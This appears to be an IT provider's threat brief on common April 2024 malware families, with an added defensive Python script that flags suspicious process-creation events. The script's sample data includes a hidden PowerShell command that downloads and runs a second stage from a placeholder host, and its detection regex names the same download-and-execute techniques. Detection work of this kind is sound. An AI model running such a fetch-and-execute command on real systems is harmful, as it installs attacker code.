Common cyber threats to be aware of
Our partner ConnectWise works with us to bring enterprise-level cyber protection products to the UK market. ConnectWise provides products that fit our Shield of Protection layered approach to cyber protection.
ConnectWise brings us a monthly brief on current threats. We want to highlight the sheer number of threats that are out there; remember that these are just the top threats, not all of them.
These are the top malware risks from April 2024. If you need support, we are only a phone call away.
+44 (0) 113 532 5377
info@nexclowd.com
Gootloader
GootLoader is a first-stage loader that has been around since 2020, typically paired with the banking trojan GootKit. Like GhostPulse, GootLoader primarily uses SEO poisoning (T1608.006) to trick victims into downloading malicious files. The GootLoader campaigns we have observed specifically target law firms, impersonating legal documents such as contracts, subpoenas, or other legal forms (see file names in IOCs below). GootLoader payloads are typically hosted on compromised WordPress sites. SEO poisoning is a common technique, and we strongly recommend not downloading any files from unknown sources.
AsyncRAT
AsyncRAT, short for Asynchronous Remote Administration Tool, is an open-source remote access tool built in C# that is available on GitHub. It is a legitimate admin tool designed to help IT teams remotely monitor and control other computers through a secure, encrypted connection. It has a robust plugin system and includes features such as client screen viewing, recording, and keylogging.
Because it is free and open source, several threat actors have been using AsyncRAT for command and control (C2): the tool establishes a secure connection to the threat actor's C2 server, which they can then use to steal passwords or deploy additional tools, such as ransomware.
FakeUpdates/SOCGholish
SOCGholish, also known as FakeUpdate(s), is a downloader written in JavaScript that lures victims into downloading malware by pretending to be a software update. It typically relies on [T1189] Drive-by Compromise for [TA0001] Initial Access. As a downloader, its primary purpose is to download other malware, and it has been used to download and deploy Dridex, NetSupport, DoppelPaymer, and others. More specifically, we have recently observed a number of SOCGholish infections downloading NetSupport RAT (see below) during April 2024.
Solarmarker/Jupyter
Solarmarker, also known as Jupyter, Polazert, and Yellow Cockatoo, is a family of malware known for its info-stealing and backdoor capabilities. As an infostealer, it is known for stealing passwords and credit card information from its victims' browsers. It also has command and control (C2) capabilities, such as file transfer and remote command execution. Solarmarker is primarily distributed by convincing users to download a malicious file using SEO poisoning (T1608.006). Some recent incidents involve downloading an LNK file (T1204.002) that executes malicious PowerShell (T1059.001).
Recent versions of Solarmarker have been using an Autodesk installer. Most of the initial files downloaded include some version of "installer-package.exe", though the actual filename may vary. Often, a user will download Solarmarker while attempting to download a non-malicious, legitimate application, such as a PDF editor. The initial dropper will launch a legitimate installer of the application it is masquerading as (T1036) while the malware installs in the background.
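The delivery chains described in this brief (SEO poisoning leading to an LNK that runs PowerShell, a fake-update JavaScript file handed to a script host, and a legitimate remote-control tool renamed and run from a user-writable folder) all leave traces in process-creation telemetry. The following is an added example of how a defender might triage such events; it is not ConnectWise tooling or code from this brief. It assumes Sysmon-style Event ID 1 fields (parent image, image, command line, and the PE OriginalFileName), and every event, path and file name below is constructed for illustration. The heuristics generalise beyond Solarmarker to the other families above, as the comments note.

```python
"""Heuristic triage of process-creation events for the malware delivery
chains discussed in the brief. Added example with constructed data; the
rules are illustrative, not a vendor detection set."""
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    parent: str              # parent process image path
    image: str               # child process image path
    cmdline: str             # child command line
    original_name: str = ""  # PE OriginalFileName, as Sysmon Event ID 1 records it


BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
POWERSHELL = {"powershell.exe", "pwsh.exe"}
# Folders an ordinary user can write to; malware delivered by download lands here.
USER_WRITABLE = re.compile(r"\\(appdata|temp|downloads|public)\\", re.I)
# PowerShell switches/cmdlets that are rare in admin scripts but common in droppers.
PS_SUSPICIOUS = re.compile(
    r"-enc(odedcommand)?\b|-w(indowstyle)?\s+hidden|downloadstring|"
    r"\biex\b|invoke-expression",
    re.I,
)


def basename(path: str) -> str:
    """Lower-cased file name component of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(ev: ProcEvent) -> list[str]:
    """Return zero or more findings, each prefixed with the ATT&CK technique it maps to."""
    findings = []
    par, img = basename(ev.parent), basename(ev.image)

    # T1204.002 -> T1059.001: a user double-clicks an LNK, so explorer.exe spawns
    # PowerShell with the LNK's arguments (Solarmarker-style delivery).
    if par == "explorer.exe" and img in POWERSHELL and PS_SUSPICIOUS.search(ev.cmdline):
        findings.append("T1059.001 explorer.exe spawned PowerShell with hidden/encoded/download arguments")

    # T1189: a browser hands a freshly downloaded .js file straight to a script
    # host, the pattern of a fake-update downloader such as SOCGholish.
    if (par in BROWSERS and img in SCRIPT_HOSTS
            and re.search(r"\.js\b", ev.cmdline, re.I)
            and USER_WRITABLE.search(ev.cmdline)):
        findings.append("T1189 browser launched a script host on downloaded JavaScript")

    # T1036: a binary in a user-writable folder whose compiled-in name differs from
    # its on-disk name, i.e. a renamed tool such as a repurposed remote-control client.
    if USER_WRITABLE.search(ev.image) and ev.original_name and ev.original_name.lower() != img:
        findings.append(f"T1036 {img} in user-writable path carries OriginalFileName {ev.original_name}")

    return findings


# Constructed sample events: three matching the chains above, two benign.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -nop -c \"IEX (New-Object Net.WebClient)"
              ".DownloadString('http://example.invalid/stage2')\"",
              "PowerShell.EXE"),
    ProcEvent(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
              r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" "C:\Users\alice\Downloads\Browser_Update.js"',
              "wscript.exe"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Users\alice\AppData\Roaming\Updates\update_helper.exe",
              r'"C:\Users\alice\AppData\Roaming\Updates\update_helper.exe" /s',
              "rc_client.exe"),  # constructed stand-in for a renamed remote-control client
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1",
              "PowerShell.EXE"),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\notepad.exe",
              r"notepad.exe C:\Users\alice\Documents\notes.txt",
              "NOTEPAD.EXE"),
]


def run_triage(events: list[ProcEvent]) -> list[tuple[int, list[str]]]:
    """Triage every event; return (index, findings) only for events that fired."""
    return [(i, f) for i, ev in enumerate(events) if (f := triage(ev))]


if __name__ == "__main__":
    for idx, found in run_triage(SAMPLE_EVENTS):
        print(f"event {idx}: " + "; ".join(found))
```

The two benign events show why the rules look at the combination of parent, child and arguments rather than at PowerShell or a script host alone: a scheduled backup script launched the same way produces no finding. In practice the OriginalFileName check should be paired with an allow-list, since some legitimate installers also rename their binaries.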
NetSupport RAT
NetSupport Manager is a legitimate remote-control utility first released in 1989. The legitimate application has been modified and repurposed by malicious threat actors and renamed NetSupport RAT. It supports file transfers, chat with support, inventory management, and remote-control access. Threat actors commonly attempt to repurpose legitimate tools for nefarious purposes as a [TA0005] Defense Evasion tactic.
Summary
In summary, there are many cyber threats that bad actors are deploying to get your money and data. Once in, they also often leave a backdoor so they can re-enter at a later time and continue.